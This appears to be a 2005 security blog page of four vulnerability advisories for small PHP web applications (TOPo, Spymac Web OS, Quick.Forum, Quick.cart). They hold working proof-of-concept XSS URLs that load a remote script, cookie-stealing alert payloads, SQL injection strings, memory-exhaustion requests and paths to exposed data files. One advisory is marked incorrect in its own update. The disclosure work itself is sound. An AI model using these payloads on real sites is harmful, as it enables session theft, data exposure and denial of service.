TOPo 2.2 multiple variable & fields XSS and information disclosure

Friday, May 20, 2005
#######################################################
TOPo 2.2 multiple variable & fields XSS and information disclosure
vendor url:http://ej3soft.ej3.net/index.php?m=info&s=topo&t=info
advisore: http://lostmon.blogspot.com/2005/05/
topo-22-multiple-variable-fields-xss.html
vendor notified: yes exploit available: yes.
OSVDB ID:16699 and 16700
secunia:SA15325
Securitytracker:1014016
BID:13700 and 13701
#######################################################

TOPo is a free TOP system written in PHP that works
without MySQL database.TOPo is specially designed for
web sites hosted in web servers that not offer a
quality MySQL support.

TOPo contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application
does not validate 'm','s','ID','t' and possible other parameters
upon submission to the 'index.php'script.This could allow a user
to create a specially crafted URL that would execute arbitrary
code in a user's browser within the trust relationship between
the browser and the server,leading to a loss of integrity.

TOPo contains a flaw too that allow remote users to information
disclosure. All data are stored in '/data/' folder and all *.dat
files store all votes, comments and other information about the
site on top. Any user can download this files and obtain all
client ip address(all clients who are vote or added a comment)

################
software use:
###############

Microsoft Windows 2000 [Version 5.00.2195] all fixes.
Internet explorer 6.0 sp1 all fixes.
Netcraft toolbar 1.5.6 ( detects all attacks XSS in this case :D)
Google toolbar 2.0.114.9-big/es

###########
versions:
###########

TOPo v2.2.178 vulnerable.

##############
solution
##############

no solution was available at this time.

############
time line
############

discovered: 13 may 2005
vendor notify: 19 may 2005
vendor response:
vendor fix:
disclosure: 20 may 2005

######################
Proof of concepts XSS
######################

http://[victim]/topo/index.php?m=top">
<SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
</script>&s=info&ID=1114815037.2498

http://[victim]/topo/index.php?m=top&s=info&ID=1115946293.3552
"><SCRIPT%20src=http://www.drorshalev.com/dev/injection/js.js>
</SCRIPT>&t=puntuar

http://[victim]/topo/index.php?m=top&s=info">
<script>alert()</script>&ID=1115946293.3552&t=puntuar

http://[victim]/topo/index.php?m=top">
<script>alert()</script>&s=info&ID=1115946293.3552&t=puntuar

http://[victim]/topo/index.php?m=top&s=info&t=comments&ID=
1114815037.2498"><SCRIPT%20src=http://www.drorshalev.com/dev/
injection/js.js></script>

http://[victim]/topo/index.php?m=top&s=info&t=comments&paso=1
&ID=1111068112.7598"><SCRIPT%20src=http://www.drorshalev.com/dev
/injection/js.js></script>

http://[victim]/topo/index.php?m=members&s=html&t=edit"><SCRIPT
%20src=http://www.drorshalev.com/dev/injection/js.js></script>

#########################

Wen try to added a new comment some fields are vulnerable
to XSS style attacks.

http://[victim]/top/index.php?m=top&s=info&t=comments
&paso=1&ID=1115946293.3552

field name vulnerable, Your web field vulnerable and
your email field are vulnerable.

##################
example of js.js
##################

Thnx to http://www.drorshalev.com for this script and for hosting it
for this demostration.

#################
js.js
#################

function showIt(){
document.body.innerHTML="<a href='javascript:alert(document.cookie)
'><center><b>Your PC Can be hacked Via "+ document.domain
+" XSS ,Html Injection to a Web Site"+document.domain +" By
DrorShalev.com<br></b><br><img border=0 src=
'http://sec.drorshalev.com/dev/injection/lig.gif' width=60 HEIGHT=60
><img src='http://www.drorshalev.com/dev/injection/gif.jpg.asp'
border=1><br></center></a>"+
document.body.innerHTML window.status="Your PC Can be hacked Via
"+ document.domain +" XSS ,Html Injection to a Web Site "
+document.domain +" By DrorShalev.com" setTimeout
("window.open('view-source:http://sec.drorshalev.com/dev/
injection/xss.txt')",6000);
}
setTimeout("showIt()",2000);

################
data disclosure
################

http://[victim]/data/

################ EnD #####################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
Thnx to http://www.drorshalev.com and dror
for his script and for hosting it !!!!
thnx to all who day after day support me !!!

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....

Spymac Web os 3.0 Abuse server´s memory and path disclose

Saturday, May 14, 2005
#########################################################
Spymac Web os 3.0 Abuse server´s memory and path disclose
vendor url:http://www.spymac.com/network.php?p=webos&wwg=20
Vendor notified : yes exploit avaible : yes
Original advisore:http://lostmon.blogspot.com/2005/05/
spymac-web-os-30-abuse-servers-memory.html
vendor notfy: yes exploit available : yes
########################################################

Spymac is powered by an integrated collection of applications
(developed in-house)that together form "Spymac WOS". Spymac
WOS is an intelligent environment featuring patent-pending
technology that allows for the creation of an immersive and
visually-stunning Web experience.


This flaw exists because the application does not validate 'c'
parameter upon submission to script.This could allow a user
to create a specially crafted URL that would consume all
memory on the server and reveals the path instalation of the
aplication,leading to a Denial Of Service and lost of integrity.

###############
versions
################

Spymac Webos 3.0 beta 190

################
solution
################

no solution at this time.

###############
timeline
###############

discovered: 11 april 2005
vendor notify: 12 april 2005
vendor response: none
Disclosure on Spymac bug forum :12 april 2005
Public disclosure: 14 may 2005


############################################
Full path disclosure and abuse of the memory
############################################

http://www.spymac.com/forums/showthread.php?threadid=134134&c=
900000000000000000000000000000

Fatal error: Maximum execution time of 120 seconds exceeded in /var/www/[victim]/classes/global_class.inc on line 770

--

with negative number:

http://[victim]/forums/showthread.php?threadid=134134&c=
-900000000000000000000000000000

Fatal error: Allowed memory size of 67108864 bytes exhausted
(tried to allocate 3840 bytes) in
/var/www/[victim]/classes/global_class.inc(201) :
regexp code on line 1

################### End #######################

thnx to estrella to be my ligth
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

Quick.Forum 'topic field' XSS and 'page' & 'iCategory' SQL injection

Tuesday, May 10, 2005
#######################################################
Quick.Forum 'topic field' XSS and 'page' & 'iCategory' SQL injection
vendor url:http://qc.dotgeek.org/os/index.php
advisore:http://lostmon.blogspot.com/2005/05/
quickforum-topic-field-xss-and-page.html
vendor notify: yes exploit available: yes
OSVDB ID:16326, 16327, 16328 , 16329
Secunia: SA15200
BID:13602
######################################################

Quick.Forum contais a flaw which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks.

Input passed to the "topic" field in "index.php" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML, script code and in a user's browser session in context of a vulnerable site.

Input passed to the "iCategory" and "page" variables in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code


########
versions
########

2.1.6 afected

It is posible to prior versions are vulnerable too.

#############
solution
#############

no solution available at this time

#########
timeline
#########

discovered:28 april 2005
vendor notify: 10 may 2005 (webform)
vendor response:
vendor fix:
disclosure:11 mayo 2005

##################
proof of comcepts
##################
###############
SQL injections
###############

http://[victim]/forum/index.php?p=&iCategory=3%20or%201=1

http://[victim]/forum/index.php?p=topicsList&page=4%20or%201=1

http://[victim]/forum/?p=&iCategory=2%20or%201=1

########
XSS
########

http://[victim]/forum/?p=newTopic // topic field are vulnerable to XSS


################
some information
################

non important information , not need password to post

http://[victim]/forum/db/users.txt //show all users of forum.

http://[victim]/forum/db/banList.txt //list of all IP banned

http://[victim]/forum/db/censureWords.txt //all censured words

the backup of the database are stored in
http://[victim]/forum/backup/qf20050509.tar.bz2
and the file have the same name of the date was made the backup,
it can download directly ,but need to know the name of the file :P


###################### End ################

thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente

Quick.cart 'sWord' variable XSS and 'iCategory' SQL injection

####################
UPDATED 19-07-2005
####################

THIS ADVISORY IS INCORRECT , Quick.cart DON´T HAVE ANY
SQL DATABASE = NO SQL QUERIES = NO SQL INJECTION.

AND THE XSS FLAW ARE SOLVED IN Quick.Cart v0.3.1

OSVDB ID:16331

########################################################



#########################################################
Quick.cart 'sWord' variable XSS and 'iCategory' SQL injection
vendor url:http://qc.dotgeek.org/os/index.php
advisore:http://lostmon.blogspot.com/2005/05/
quickcart-sword-variable-xss-and.html
vendor notify: yes exploit available: yes
OSVDB ID: 16330 and 16331
Secunia: SA15297
BID:13599
##########################################################

Quick.cart contais a flaw which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks.

Input passed to the "sWord" variable in "index.php" isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML, script code and in a user's browser session in context of a vulnerable site.

Input passed to the "iCategory" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code



########
versions
########

0.3.0 afected


#############
solution
#############

no solution available at this time

#########
timeline
#########

discovered:28 april 2005
vendor notify: 10 may 2005 (webform)
vendor response:
vendor fix:
disclosure: 11 may 2005

##################
proof of comcepts
##################
#####################
Cross site scripting
#####################

http://[victim]/?p=productsList&sWord=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/index.php?p=productsList&sWord=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

##############
sql injection:
##############

http://[victim]/?p=productsList&
iCategory=7%20or%201=1

http://[victim]/index.php?p=productsList&
iCategory=7%20or%201=1


############### End #####################


thnx to estrella to be my ligth
Thnx to icaro He is my Shadow ;P
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends